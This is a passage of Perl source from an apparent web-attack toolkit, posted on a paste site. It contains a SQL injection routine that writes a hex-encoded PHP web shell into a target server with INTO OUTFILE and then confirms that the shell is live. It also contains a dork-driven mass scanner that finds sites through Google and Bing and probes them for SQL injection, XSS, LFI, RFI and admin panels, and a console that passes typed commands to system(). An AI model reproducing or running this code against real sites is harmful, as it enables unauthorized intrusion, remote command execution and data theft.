- "\n[+] Length of the rows : $tota\n\n", "text",
- "13", "5"
- );
- printear( "[+] Extracting values...\n\n", "text", "13", "5" );
- printear( "[$_[1]] [$_[2]]\n\n", "text", "13", "5" );
- savefilear( $_[5] . ".txt", "[Table] : $_[3]" );
- savefilear( $_[5] . ".txt", "[+] Length of the rows: $tota\n" );
- savefilear( $_[5] . ".txt", "[$_[1]] [$_[2]]\n" );
- for my $limit ( 0 .. $tota ) {
- chomp $limit;
- $injection =
- toma( $start
- . $concat
- . $end
- . $pass1 . "from"
- . $pass1
- . $_[3]
- . $pass1 . "limit"
- . $pass1
- . $limit . ",1"
- . $pass2 );
- if ( $injection =~ /ERTOR854(.*)ERTOR854(.*)ERTOR854/ig ) {
- savefilear( $_[5] . ".txt",
- "[$_[1]] : $1 [$_[2]] : $2" );
- printear(
- "[$_[1]] : $1 [$_[2]] : $2\n", "text",
- "7", "5"
- );
- }
- else {
- printear( "\n[+] Extracting Finish\n",
- "text", "13", "5" );
- &reload;
- }
- }
- }
- else {
- printear( "[-] Not Found any DATA\n\n", "text", "5", "5" );
- }
- }
- }
- sub into {
- printear( "\n[Status] : Injecting a SQLI for create a shell\n",
- "text", "13", "5" );
- my ( $page, $bypass, $dir, $save ) = @_;
- savefilear( $save . ".txt", "\n" );
- print "\n";
- ( $pass1, $pass2 ) = &bypass($bypass);
- my ( $scheme, $auth, $path, $query, $frag ) = uri_split($page);
- if ( $path =~ /\/(.*)$/ ) {
- my $path1 = $1;
- my $path2 = $path1;
- $path2 =~ s/$1//;
- $dir =~ s/$path1//ig;
- $shell = $dir . "/" . "shell.php";
- if ( $page =~ /(.*)hackman(.*)/ig ) {
- my ( $start, $end ) = ( $1, $2 );
- $code =
- toma( $start
- . "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e"
- . $end
- . $pass1 . "into"
- . $pass1
- . "outfile"
- . $pass1 . "'"
- . $shell . "'"
- . $pass2 );
- $code1 =
- toma( "http://" . $auth . "/" . $path2 . "/" . "shell.php" );
- if ( $code1 =~ /Mini Shell By Doddy/ig ) {
- printear(
- "[Shell Up] : http://"
- . $auth . "/"
- . $path2 . "/"
- . "shell.php" . "\a\a",
- "text", "7", "5"
- );
- savefilear(
- $save . ".txt",
- "[shell up] : http://"
- . $auth . "/"
- . $path2 . "/"
- . "shell.php"
- );
- }
- else {
- printear( "[Shell] : Not Found", "text", "5", "5" );
- }
- }
- }
- }
- } ##
- sub load_paranoic_old {
- installer_par();
- staq();
- sub staq {
- sub head_scan {
- clean();
- printear( "
- @@@ @@@@ @ @ @ @ @ @@@@@ @@@@@
- @ @ @ @ @ @@ @ @@ @ @ @ @
- @ @ @ @ @@ @ @@ @ @ @ @
- @ @ @ @ @ @ @ @ @ @ @ @ @
- @@@ @ @ @ @ @ @ @ @ @ @@@@ @@@@@
- @ @ @ @ @ @ @ @ @ @ @ @ @
- @ @ @@@@@ @ @@ @ @@ @ @ @
- @ @ @ @@ @ @ @@ @ @@ @ @ @
- @@@ @@@@ @ @ @ @ @ @ @@@@@ @ @
- ", "logos", "7", "5" );
- }
- &menu_sca;
- sub menu_sca {
- &head_scan;
- printear( "[a] : Scan a File\n", "text", "13", "5" );
- printear(
- "[b] : Search in Google and scan the webs\n", "text",
- "13", "5"
- );
- printear(
- "[c] : Search in Bing and scan the webs\n", "text",
- "13", "5"
- );
- printear( "[d] : Exit\n\n", "text", "13", "5" );
- my $op = printear( "[option] : ", "stdin", "11", "13" );
- scan($op);
- }
- sub scan {
- my $count;
- my $option;
- my $op = shift;
- my @paginas;
- if ( $op =~ /a/ig ) {
- my $word = printear( "\n[+] Wordlist : ", "stdin", "11", "13" );
- @paginas = repes( cortar( savewordss($word) ) );
- $option = &men;
- if ( $option =~ /Q/ig ) {
- $count =
- printear( "\n[+] Panels Count : ", "stdin", "11", "13" );
- }
- }
- elsif ( $op =~ /b/ig ) {
- my $dork = printear( "\n[+] Dork : ", "stdin", "11", "13" );
- my $pag = printear( "\n[+] Pages : ", "stdin", "11", "13" );
- $option = &men;
- if ( $option =~ /Q/ig ) {
- $count =
- printear( "\n[+] Panels Count : ", "stdin", "11", "13" );
- }
- printear( "\n[+] Searching in Google ...\n", "text", "13",
- "5" );
- @paginas = &google( $dork, $pag );
- }
- elsif ( $op =~ /c/ig ) {
- my $dork = printear( "\n[+] Dork : ", "stdin", "11", "13" );
- my $pag = printear( "\n[+] Pages : ", "stdin", "11", "13" );
- $option = &men;
- if ( $option =~ /Q/ig ) {
- $count =
- printear( "\n[+] Panels Count : ", "stdin", "11", "13" );
- }
- printear( "\n[+] Searching in Bing ...\n", "text", "13", "5" );
- @paginas = &bing( $dork, $pag );
- }
- elsif ( $op =~ /d/ig ) {
- estoydentroporahora();
- }
- else {
- &finish_now;
- }
- printear( "\n[+] Scanning [" . int(@paginas) . "] pages ...\n\n",
- "text", "7", "5" );
- $total_vulnerables = "0";
- for (@paginas) {
- if ( $option =~ /S/ig ) {
- scansql($_);
- }
- if ( $option =~ /K/ig ) {
- sql($_);
- }
- if ( $option =~ /Q/ig ) {
- sqladmin( $_, $count );
- }
- if ( $option =~ /Y/ig ) {
- simple($_);
- }
- if ( $option =~ /L/ig ) {
- lfi($_);
- }
- if ( $option =~ /R/ig ) {
- rfi($_);
- }
- if ( $option =~ /F/ig ) {
- fsd($_);
- }
- if ( $option =~ /X/ig ) {
- scanxss($_);
- }
- if ( $option =~ /M/ig ) {
- mssql($_);
- }
- if ( $option =~ /J/ig ) {
- access($_);
- }
- if ( $option =~ /O/ig ) {
- oracle($_);
- }
- if ( $option =~ /HT/ig ) {
- http($_);
- }
- if ( $option =~ /A/ig ) {
- scansql($_);
- scanxss($_);
- mssql($_);
- access($_);
- oracle($_);
- lfi($_);
- rfi($_);
- fsd($_);
- http($_);
- }
- }
- }
- printear( "\n[+] Vulnerable pages found : " . $total_vulnerables . "\n",
- "text", "13", "5" );
- &finish_now;
- }
- sub sql {
- my ( $pass1, $pass2 ) = ( "+", "--" );
- my $page = shift;
- $code1 =
- toma( $page . "-1"
- . $pass1 . "union"
- . $pass1
- . "select"
- . $pass1 . "666"
- . $pass2 );
- if ( $code1 =~
- /The used SELECT statements have a different number of columns/ig )
- {
- printear( "[+] SQLI : $page\a\n", "text", "11", "5" );
- $total_vulnerables++;
- savefile( "sql-logs.txt", $page );
- }
- }
- sub sqladmin {
- my ( $pass1, $pass2 ) = ( "+", "--" );
- my $page = $_[0];
- my $limite = $_[1];
- if ( $limite eq "" ) {
- $limite = 3;
- }
- $code1 =
- toma( $page . "-1"
- . $pass1 . "union"
- . $pass1
- . "select"
- . $pass1 . "666"
- . $pass2 );
- if ( $code1 =~
- /The used SELECT statements have a different number of columns/ig )
- {
- printear( "\n[+] SQLI : $page\a\n", "text", "11", "5" );
- $total_vulnerables++;
- savefile( "sql-logs.txt", $page );
- my ( $scheme, $auth, $path, $query, $frag ) = uri_split($page);
- my $fage = "http://" . $auth;
- my $count = 0;
- for my $path (@paneles) {
- if ( $count eq $limite ) {
- last;
- }
- $code = tomados( $fage . "/" . $path );
- if ( $code->is_success ) {
- $controlt = 1;
- $count++;
- printear(
- "[+] Link : " . $fage . "/" . $path . "\n", "text",
- "11", "5"
- );
- savefile( "admin-logs.txt", $fage . "/" . $path );
- }
- }
- }
- }
- sub http {
- my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
- my $code = $nave->get( $_[0] );
- if ( $_[0] =~ /http:\/\// ) {
- printear( "\n[+] Page : $auth", "text", "11", "5" );
- printear( "\n[+] Date : " . $code->header('date'),
- "text", "11", "5" );
- printear(
- "\n[+] Server : " . $code->header('server'), "text",
- "11", "5"
- );
- printear( "\n[+] Connection : " . $code->header('connection'),
- "text", "11", "5" );
- printear(
- "\n[+] Content-Type : " . $code->header('content-type') . "\n",
- "text", "11", "5"
- );
- savefile( "http-logs.txt", "\n[+] Page : $auth" );
- savefile( "http-logs.txt", "[+] Date : " . $code->header('date') );
- savefile( "http-logs.txt",
- "[+] Server : " . $code->header('server') );
- savefile( "http-logs.txt",
- "[+] Connection : " . $code->header('connection') );
- savefile( "http-logs.txt",
- "[+] Content-Type : " . $code->header('content-type') );
- }
- }
- sub scanxss {
- my $page = $_[0];
- my $espacio_scan;
- chomp $page;
- if ( $_[1] eq "yes" ) {
- $espacio_scan = "\n";
- }
- my @testar = HTML::Form->parse( toma($page), "/" );
- my @botones_names;
- my @botones_values;
- my @orden;
- my @pa = (
- "<script>alert(String.fromCharCode(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111))</script>",
- '"><script>alert(String.fromCharCode(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111))</script>'
- );
- my @get_founds;
- my @post_founds;
- my @ordenuno;
- my @ordendos;
- my @valores;
- my $contador_forms = 0;
- my $valor = "doddyhackman";
- for my $test (@testar) {
- $contador_forms++;
- if ( $test->method eq "POST" ) {
- my @inputs = $test->inputs;
- for my $in (@inputs) {
- if ( $in->type eq "submit" ) {
- if ( $in->name eq "" ) {
- push( @botones_names, "submit" );
- }
- push( @botones_names, $in->name );
- push( @botones_values, $in->value );
- }
- else {
- push( @ordenuno, $in->name, $pa[0] );
- push( @valores, $in->name );
- push( @ordendos, $in->name );
- }
- }
- for my $n ( 0 .. int(@botones_names) - 1 ) {
- my @preuno = @ordenuno;
- my @predos = @ordendos;
- push( @preuno, $botones_names[$n], $botones_values[$n] );
- push( @predos, $botones_names[$n], $botones_values[$n] );
- my $codeuno = $nave->post( $page, \@preuno )->content;
- my $codedos = $nave->post( $page, \@predos )->content;
- if ( $codeuno =~
- /<script>alert\(String.fromCharCode\(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111\)\)<\/script>/ig
- or $codedos =~
- /<script>alert\(String.fromCharCode\(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111\)\)<\/script>/ig
- )
- {
- if ( $test->attr(name) eq ""
- or $test->attr(name) eq " " )
- {
- push( @post_founds, $contador_forms );
- }
- else {
- push( @post_founds, $test->attr(name) );
- }
- }
- }
- }
- else { #Fin de metodo POST
- my @inputs = $test->inputs;
- for my $in (@inputs) {
- if ( $in->type eq "submit" ) {
- if ( $in->name eq "" ) {
- push( @botones_names, "submit" );
- }
- push( @botones_names, $in->name );
- push( @botones_values, $in->value );
- }
- else {
- $orden .= '' . $in->name . '=' . $valor . '&';
- }
- }
- chop($orden);
- for my $n ( 0 .. int(@botones_names) - 1 ) {
- my $partedos =
- "&" . $botones_names[$n] . "=" . $botones_values[$n];
- my $final = $orden . $partedos;
- for my $strin (@pa) {
- chomp $strin;
- $final =~ s/doddyhackman/$strin/;
- $code = toma( $page . "?" . $final );
- my $strin = "\Q$strin\E";
- if ( $code =~ /$strin/ ) {
- push( @get_founds, $page . "?" . $final );
- }
- }
- }
- }
- }
- my @get_founds = repes(@get_founds);
- if ( int(@get_founds) ne 0 ) {
- for (@get_founds) {
- $total_vulnerables++;
- savefile( "xss-logs.txt", "[+] XSS Found : $_" );
- printear( $espacio_scan . "[+] XSS Found : $_\n\a",
- "text", "11", "5" );
- }
- }
- my @post_founds = repes(@post_founds);
- if ( int(@post_founds) ne 0 ) {
- for my $t (@post_founds) {
- if ( $t =~ /^\d+$/ ) {
- $total_vulnerables++;
- savefile( "xss-logs.txt", "[+] XSS : Form $t in $page" );
- printear(
- "\n[+] XSS : Form $t in $page\n\a", "text",
- "11", "5"
- );
- }
- }
- printear( "[+] Values : @valores \n", "text", "11", "5" );
- }
- }
- sub simple {
- my $code = toma( $_[0] );
- my @links = get_links($code);
- for my $com (@links) {
- my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
- if ( $path =~ /\/(.*)$/ ) {
- my $path1 = $1;
- $_[0] =~ s/$path1//ig;
- my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com);
- if ( $path =~ /(.*)\// ) {
- my $parche = $1;
- unless ( $repetidos =~ /$parche/ ) {
- $repetidos .= " " . $parche;
- my $code = toma( "http://" . $auth . $parche );
- if ( $code =~ /Index of (.*)</ig ) {
- my $dir_found = $1;
- chomp $dir_found;
- $total_vulnerables++;
- printear(
- "[+] Directory Found : "
- . "http://"
- . $auth
- . $parche . "\n",
- "text", "11", "5"
- );
- savefile( "paths-logs.txt",
- "[+] Directory Found : "
- . "http://"
- . $auth
- . $parche );
- }
- }
- }
- }
- }
- }
- sub scansql {
- my $page = shift;
- my $copia = $page;
- $co = toma( $page . "'" );
- if ( $co =~
- /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig
- || $co =~ /mysql_free_result/ig
- || $co =~ /mysql_fetch_assoc/ig
- || $co =~ /mysql_num_rows/ig
- || $co =~ /mysql_fetch_array/ig
- || $co =~ /mysql_fetch_assoc/ig
- || $co =~ /mysql_query/ig
- || $co =~ /mysql_free_result/ig
- || $co =~ /equivocado en su sintax/ig
- || $co =~ /You have an error in your SQL syntax/ig
- || $co =~ /Call to undefined function/ig )
- {
- savefile( "sql-logs.txt", "[+] SQL : $page" );
- $total_vulnerables++;
- printear( "[+] SQLI : $page\a\n", "text", "11", "5" );
- }
- else {
- if ( $page =~ /(.*)\?(.*)/ ) {
- my $page = $1;
- my @testar = HTML::Form->parse( toma($page), "/" );
- my @botones_names;
- my @botones_values;
- my @orden;
- my @get_founds;
- my @post_founds;
- my @ordenuno;
- my @ordendos;
- my $contador_forms = 0;
- my $valor = "doddyhackman";
- for my $test (@testar) {
- $contador_forms++;
- if ( $test->method eq "POST" ) {
- my @inputs = $test->inputs;
- for my $in (@inputs) {
- if ( $in->type eq "submit" ) {
- if ( $in->name eq "" ) {
- push( @botones_names, "submit" );
- }
- push( @botones_names, $in->name );
- push( @botones_values, $in->value );
- }
- else {
- push( @ordenuno, $in->name, "'" );
- }
- }
- for my $n ( 0 .. int(@botones_names) - 1 ) {
- my @preuno = @ordenuno;
- push( @preuno,
- $botones_names[$n], $botones_values[$n] );
- my $code = $nave->post( $page, \@preuno )->content;
- if ( $code =~
- /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig
- || $code =~ /mysql_free_result/ig
- || $code =~ /mysql_fetch_assoc/ig
- || $code =~ /mysql_num_rows/ig
- || $code =~ /mysql_fetch_array/ig
- || $code =~ /mysql_fetch_assoc/ig
- || $code =~ /mysql_query/ig
- || $code =~ /mysql_free_result/ig
- || $code =~ /equivocado en su sintax/ig
- || $code =~
- /You have an error in your SQL syntax/ig
- || $code =~ /Call to undefined function/ig )
- {
- if ( $test->attr(name) eq ""
- or $test->attr(name) eq " " )
- {
- push( @post_founds, $contador_forms );
- }
- else {
- push( @post_founds, $test->attr(name) );
- }
- }
- }
- }
- my @post_founds = repes(@post_founds);
- if ( int(@post_founds) ne 0 ) {
- for my $t (@post_founds) {
- if ( $t =~ /^\d+$/ ) {
- $total_vulnerables++;
- savefile( "sql-logs.txt",
- "[+] SQLI : Form $t in $page" );
- printear(
- "[+] SQLI : Form $t in $page\n\a", "text",
- "11", "5"
- );
- }
- }
- }
- }
- }
- }
- }
- sub access {
- my $page = shift;
- $code1 = toma( $page . "'" );
- if ( $code1 =~ /Microsoft JET Database/ig
- or $code1 =~ /ODBC Microsoft Access Driver/ig )
- {
- printear( "[+] Jet DB : $page\a\n", "text", "11", "5" );
- savefile( "jetdb-logs.txt", $page );
- $total_vulnerables++;
- }
- }
- sub mssql {
- my $page = shift;
- $code1 = toma( $page . "'" );
- if ( $code1 =~ /ODBC SQL Server Driver/ig ) {
- printear( "[+] MSSQL : $page\a\n", "text", "11", "5" );
- savefile( "mssql-logs.txt", $page );
- $total_vulnerables++;
- }
- }
- sub oracle {
- my $page = shift;
- $code1 = toma( $page . "'" );
- if ( $code1 =~ /Microsoft OLE DB Provider for Oracle/ig ) {
- printear( "[+] Oracle : $page\a\n", "text", "11", "5" );
- savefile( "oracle-logs.txt", $page );
- $total_vulnerables++;
- }
- }
- sub rfi {
- my $page = shift;
- $code1 = toma( $page . "http:/www.supertangas.com/" );
- if ( $code1 =~ /Los mejores TANGAS de la red/ig )
- { #Esto es conocimiento de verdad xDDD
- printear( "[+] RFI : $page\a\n", "text", "11", "5" );
- savefile( "rfi-logs.txt", $page );
- $total_vulnerables++;
- }
- }
- sub lfi {
- my $page = shift;
- $code1 = toma( $page . "'" );
- if ( $code1 =~ /No such file or directory in <b>(.*)<\/b> on line/ig ) {
- printear( "[+] LFI : $page\a\n", "text", "11", "5" );
- savefile( "lfi-logs.txt", $page );
- $total_vulnerables++;
- }
- }
- sub fsd {
- my $page = shift;
- my $archivo;
- if ( $page =~ /(.*)\/(.*)\?/ ) {
- $archivo = $2;
- }
- my $code = toma( $page . $archivo );
- if ( $code =~ /header\((.*)Content-Disposition: attachment;/ig ) {
- printear( "[+] Full Source Discloure : $page\a\n",
- "text", "11", "5" );
- $total_vulnerables++;
- savefile( "fpd-logs.txt", $page );
- }
- }
- sub men {
- printear( "\n[+] Scan Type : \n", "text", "5", "5" );
- printear( "
- [X] : XSS
- [S] : SQL GET/POST
- [K] : SQL GET
- [Q] : SQL GET + Admin
- [Y] : Directory listing
- [M] : MSSQL
- [J] : Jet Database
- [O] : Oracle
- [L] : LFI
- [R] : RFI
- [F] : Full Source Discloure
- [HT] : HTTP Information
- [A] : All
- ", "logos", "13", "5" );
- my $option = printear( "\n[Options] : ", "stdin", "11", "13" );
- return $option;
- }
- sub finish_now {
- adios();
- }
- sub bing {
- my ( $a, $b ) = @_;
- for ( $pages = 10 ; $pages <= $b ; $pages = $pages + 10 ) {
- my $code =
- toma( "http://www.bing.com/search?q=" . $a . "&first=" . $pages );
- while ( $code =~ /<h3><a href="(.*?)"/mig ) {
- push( @founds, $1 );
- }
- while ( $code =~ /<h2><a href="(.*?)"/mig ) {
- push( @founds, $1 );
- }
- }
- my @founds = repes( cortar(@founds) );
- return @founds;
- }
- sub google {
- my ( $a, $b ) = @_;
- my @founds;
- for ( $pages = 10 ; $pages <= $b ; $pages = $pages + 10 ) {
- $code =
- toma( "https://www.google.com.ar/search?hl=&q="
- . $a
- . "&start=$pages" );
- while ( $code =~ /(?<="r"><. href=")(.+?)"/mig ) {
- my $url = $1;
- push( @founds, uri_unescape($url) );
- }
- }
- my @founds = repes( cortar(@founds) );
- return @founds;
- }
- } ##
- sub load_cmd {
- head_console();
- sub head_console {
- clean();
- printear( "
- @@@@ @@@@ @ @ @@@ @@@@ @ @@@@@
- @ @ @ @ @@ @ @ @ @ @ @ @
- @ @ @ @@ @ @ @ @ @ @
- @ @ @ @ @ @ @ @ @ @ @
- @ @ @ @ @ @ @@@ @ @ @ @@@@
- @ @ @ @ @ @ @ @ @ @ @
- @ @ @ @ @@ @ @ @ @ @
- @ @ @ @ @ @@ @ @ @ @ @ @
- @@@@ @@@@ @ @ @@@ @@@@ @@@@@ @@@@@
- ", "logos", "7", "5" );
- }
- while (1) {
- my $cmd = printear( "\n[+] Command : ", "stdin", "11", "13" );
- print "\n";
- if ( $cmd eq "exit" ) {
- adios();
- }
- else {
- my $data = getdatanownownownow();
- if ( $data =~ /colors=n/ ) {
- system($cmd);
- }
- else {
- cprint "\x037";
- system($cmd);
- cprint "\x030";
- }
- }
- }
- } ##
- ##
- ##Funciones secundarias ###
- sub toma {
- return $nave->get( $_[0] )->content;
- }
- sub tomados {
- return $nave->get( $_[0] );
- }
- sub tomar {
- my ( $web, $var ) = @_;
- return $nave->post( $web, [ %{$var} ] )->content;
- }
- sub ver_length {
- return true if length( $_[0] ) == 32;
- }
- sub savefile {
- open( SAVE, ">>logs/" . $_[0] );
- print SAVE $_[1] . "\n";
- close SAVE;
- }
- sub get_links {
- $test = HTML::LinkExtor->new( \&agarrar )->parse( $_[0] );
- return @links;
- sub agarrar {
- my ( $a, %b ) = @_;
- push( @links, values %b );
- }
- }
- sub adios {
- printear( "\n[+] Press the enter key to return to main menu\n",
- "text", "13", "5" );
- <stdin>;
- estoydentro();
- }
- sub savefilear {
- open( SAVE, ">>logs/webs/" . $_[0] );
- print SAVE $_[1] . "\n";
- close SAVE;
- }
- sub partimealmedio {
- my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
- my $save = $auth;
- $save =~ s/:/_/;
- return $save;
- }
- sub encode {
- my $string = $_[0];
- $hex = '0x';
- for ( split //, $string ) {
- $hex .= sprintf "%x", ord;
- }
- return $hex;
- }
- sub decode {
- $_[0] =~ s/^0x//;
- $encode = join q[], map { chr hex } $_[0] =~ /../g;
- return $encode;
- }
- sub bypass {
- if ( $_[0] eq "/*" ) { return ( "/**/", "/**/" ); }
- elsif ( $_[0] eq "%20" ) { return ( "%20", "%00" ); }
- else { return ( "+", "--" ); }
- }
- sub ascii {
- return join ',', unpack "U*", $_[0];
- }
- sub ascii_de {
- $_[0] = join q[], map { chr } split q[,], $_[0];
- return $_[0];
- }
- sub installer_kobra {
- unless ( -d "/logs/webs" ) {
- mkdir( "logs/", 777 );
- mkdir( "logs/webs/", 777 );
- chmod "logs/", "0777";
- chmod "logs/webs/", "0777";
- }
- }
- sub cortar {
- my @nuevo;
- for (@_) {
- if ( $_ =~ /=/ ) {
- @tengo = split( "=", $_ );
- push( @nuevo, @tengo[0] . "=" );
- }
- else {
- push( @nuevo, $_ );
- }
- }
- return @nuevo;
- }
- sub installer_par {
- unless ( -d "logs/" ) {
- mkdir( "logs/", "777" );
- chmod "logs/", "0777";
- }
- }
- sub repes {
- my @limpio;
- foreach $test (@_) {
- push @limpio, $test unless $repe{$test}++;
- }
- return @limpio;
- }
- sub nombre {
- my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
- return $auth;
- }
- sub savewordss {
- my @r;
- my @words;
- open( FILE, $_[0] );
- @words = <FILE>;
- close FILE;
- for (@words) {
- push( @r, $_ );
- }
- return (@r);
- }
- sub savewords {
- open my $on, '<', $_[0];
- undef $/;
- my $contenido = <$on>;
- close $on;
- return $contenido;
- }
- sub borrar_archivos {
- opendir my ($list), $_[0];
- my @aborrar = readdir $list;
- closedir $list;
- for my $borrar (@aborrar) {
- if ( -f $_[0] . "/" . $borrar ) {
- unlink( $_[0] . "/" . $borrar );
- }
- }
- }
- sub getdatanownownownow {
- open my $FILE, q[<], "data.txt";
- my $word = join q[], <$FILE>;
- close $FILE;
- return $word;
- }
- sub savefil {
- open( SAVE, ">>" . $_[0] );
- print SAVE $_[1];
- close SAVE;
- }
- sub cargarlogs {
- my $os = $^O;
- if ( $os =~ /Win/ig ) {
- system( "start " . $_[0] );
- }
- else {
- system( "firefox " . $_[0] );
- }
- }
- sub system_leida {
- my $os = $^O;
- if ( $os =~ /Win/ig ) {
- system( "start " . $_[0] );
- }
- else {
- system( "gedit " . $_[0] );
- }
- }
- ##
- #The End ?
Add Comment
Please, Sign In to add comment